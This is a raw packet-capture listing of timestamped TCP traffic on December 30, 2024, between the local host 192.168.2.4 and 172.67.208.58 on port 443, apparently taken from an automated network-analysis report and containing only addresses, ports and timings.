                                                                                                                                                                                                                                Dec 30, 2024 19:10:31.992656946 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:31.992683887 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:31.992706060 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.001876116 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.038059950 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.038081884 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.038175106 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.038184881 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.038249969 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.079478979 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.079498053 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.079570055 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.079576969 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.079735994 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.079801083 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.079822063 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.079859018 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.079863071 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.079890966 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.079910994 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.080075979 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.080096960 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.080128908 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.080132961 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.080158949 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.080177069 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.080394030 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.080414057 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.080447912 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.080451965 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.080476999 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.080497026 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.080668926 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.080701113 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.080732107 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.080735922 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.080765009 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.080773115 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.080981970 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.080997944 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.081038952 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.081058979 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.081063032 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.081104040 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.081132889 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.081377029 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.081396103 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.081459999 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.081465006 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.081515074 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.167963028 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.167982101 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.168019056 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.168024063 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.168051958 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.168059111 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.168339968 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.168375969 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.168405056 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.168407917 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.168433905 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.168452024 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.168564081 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.168576956 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.168612957 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.168617010 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.168646097 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.168658018 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.168889046 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.168901920 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.168953896 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.168957949 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.169193029 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.169219971 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.169234037 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.169271946 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.434474945 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.434535027 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.434611082 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.434623957 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.434663057 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.434667110 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.434695005 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.434710026 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.435018063 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.435033083 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.435070992 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.435074091 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.435106039 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.435113907 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.435225010 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.435237885 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.435280085 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.435282946 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.435314894 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.435322046 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.435462952 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.435478926 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.435522079 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.435525894 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.435558081 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.435576916 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.435880899 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.435897112 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.435935020 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.435937881 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.435962915 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.435980082 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.436016083 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.436033964 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.436069012 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.436072111 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.436096907 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.436114073 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.522469044 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.522485018 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.522536993 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.522558928 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.522572994 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.522617102 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.522902966 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.522922039 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.522957087 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.522960901 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.522984982 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.523013115 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.523093939 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.523132086 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.523144007 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.523148060 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.523156881 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.523183107 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.523207903 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.523433924 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.523448944 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.523483038 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.523487091 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.523510933 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.523526907 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.523730993 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.523750067 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.523782969 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.523787022 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.523816109 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.523833990 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.524127007 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.524138927 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.524173021 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.524178982 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.524202108 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.524224043 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.524420023 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.524449110 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.524473906 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.524477959 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.524485111 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.524499893 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.524533033 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.524535894 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.524575949 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.524641037 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.524678946 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.524691105 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.524693966 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.524719000 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.524735928 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.610984087 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.611004114 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.611072063 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.611099005 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.611222982 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.611484051 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.791960001 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.791974068 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.792018890 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.792025089 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.792463064 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.876876116 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.876912117 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.876944065 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.876952887 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.876982927 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.877408028 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.877424002 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.877489090 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.877494097 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.877526045 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.877681971 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.877707005 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.877738953 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.877743959 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.877763987 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.877779007 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.877806902 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.877810955 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.877856016 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.877913952 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.877928019 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.877976894 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.877980947 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.878268003 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.878429890 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.878444910 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.878479958 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.878484964 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.878518105 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.878539085 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.880074978 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.880098104 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.880129099 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.880134106 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.880160093 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.880179882 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.880266905 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.880299091 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.880316019 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.880320072 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.880342960 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.880362988 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.880531073 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.880547047 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.880584002 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.880589962 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.880620003 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.880635023 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.965558052 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.965575933 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.965656996 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.965697050 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.965857029 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.966012955 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.966025114 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.966089010 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.966094971 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.966186047 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.966244936 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.966257095 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.966314077 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.966320992 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.966394901 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.966496944 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.966510057 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.966567993 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.966573954 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.966639996 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.966936111 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.966967106 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.966999054 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.967005968 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.967034101 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.967080116 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.968591928 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.968611002 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.968657017 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.968664885 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.968805075 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.968811035 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.968816042 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.968839884 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.968861103 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.968868017 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.968889952 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.968902111 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.969085932 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.969099045 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.969141960 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.969147921 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:32.969172001 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:33.234963894 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:33.235006094 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:33.235012054 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:33.235121012 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:33.320071936 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:33.320096970 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:33.320163965 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:33.320179939 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:33.320271015 CET49746443192.168.2.4172.67.208.58
